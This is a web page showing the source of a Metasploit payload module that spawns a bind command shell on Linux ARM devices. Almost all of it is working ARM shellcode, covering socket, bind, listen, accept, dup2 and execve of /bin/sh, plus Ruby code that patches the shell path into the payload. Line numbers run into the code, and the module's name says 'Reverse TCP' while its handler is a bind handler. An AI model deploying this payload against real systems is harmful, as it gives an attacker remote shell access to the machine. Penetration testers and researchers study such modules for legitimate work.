Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 208910include Msf::Payload::Single11include Msf::Payload::Linux12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Command Shell, Reverse TCP Inline',17'Version' => '',18'Description' => 'Connect to target and spawn a command shell',19'Author' => ['civ', 'hal'],20'License' => MSF_LICENSE,21'Platform' => 'linux',22'Arch' => ARCH_ARMLE,23'Handler' => Msf::Handler::BindTcp,24'Session' => Msf::Sessions::CommandShellUnix,25'Payload' =>26{27'Offsets' =>28{29'RHOST' => [ 172, 'ADDR' ],30'LPORT' => [ 170, 'n' ],31},32'Payload' =>33[34# socket350xe3a00002, # mov r0, #2360xe3a01001, # mov r1, #1370xe3a02006, # mov r2, #6380xe3a07001, # mov r7, #1390xe1a07407, # lsl r7, r7, #8400xe2877019, # add r7, r7, #25410xef000000, # svc 0x00000000420xe1a06000, # mov r6, r04344# bind450xe28f1080, # 1dr r1, pc, #128460xe3a02010, # mov r2, #16470xe3a07001, # mov r7, #1480xe1a07407, # lsl r7, r7, #8490xe287701a, # add r7, r7, #26500xef000000, # svc 0x000000005152# listen530xe1a00006, # mov r0, r6540xe3a07001, # mov r7, #1550xe1a07407, # lsl r7, r7, #8560xe287701c, # add r7, r7, #28570xef000000, # svc 0x000000005859# accept600xe1a00006, # mov r0, r6610xe0411001, # sub r1, r1, r1620xe0422002, # sub r2, r2, r2630xe3a07001, # mov r7, #1640xe1a07407, # lsl r7, r7, #8650xe287701d, # add r7, r7, #29660xef000000, # svc 0x000000006768# dup690xe1a06000, # mov r6, r0700xe3a01002, # mov r1, #2710xe1a00006, # mov r0, r6720xe3a0703f, # mov r7, #63 ; 0x3f730xef000000, # svc 0x00000000740xe2511001, # subs r1, r1, #1750x5afffffa, # bpl 8c <.text+0x8c>7677# execve("/system/bin/sh", args, env)780xe28f0024, # add r0, pc, #36 ; 0x24790xe0244004, # eor r4, r4, r4800xe92d0010, # push {r4}810xe1a0200d, # mov r2, sp820xe28f4024, # add r4, pc, #36 ; 0x10830xe92d0010, # push {r4}840xe1a0100d, # mov r1, sp850xe3a0700b, # mov r7, #11 ; 0xb860xef000000, # svc 0x000000008788# <af>:890x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2900x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.19192# <shell>:930x00000000, # .word 0x00000000 ; the shell goes here!940x00000000, # .word 0x00000000950x00000000, # .word 0x00000000960x00000000, # .word 0x000000009798# <arg>:990x00000000, # .word 0x00000000 ; the args!1000x00000000, # .word 0x000000001010x00000000, # .word 0x000000001020x00000000, # .word 0x00000000103104].pack("V*")105}106))107108# Register command execution options109register_options(110[111OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),112OptString.new('ARGV0', [ false, "argv[0] to pass to execve", "sh" ]) # mostly used for busybox113])114end115116def generate(_opts = {})117p = super118119sh = datastore['SHELL']120if sh.length >= 16121raise ArgumentError, "The specified shell must be less than 16 bytes."122end123p[176, sh.length] = sh124125arg = datastore['ARGV0']126if arg127if arg.length >= 16128raise ArgumentError, "The specified argv[0] must be less than 16 bytes."129end130p[192, arg.length] = arg131end132133p134end135end136137138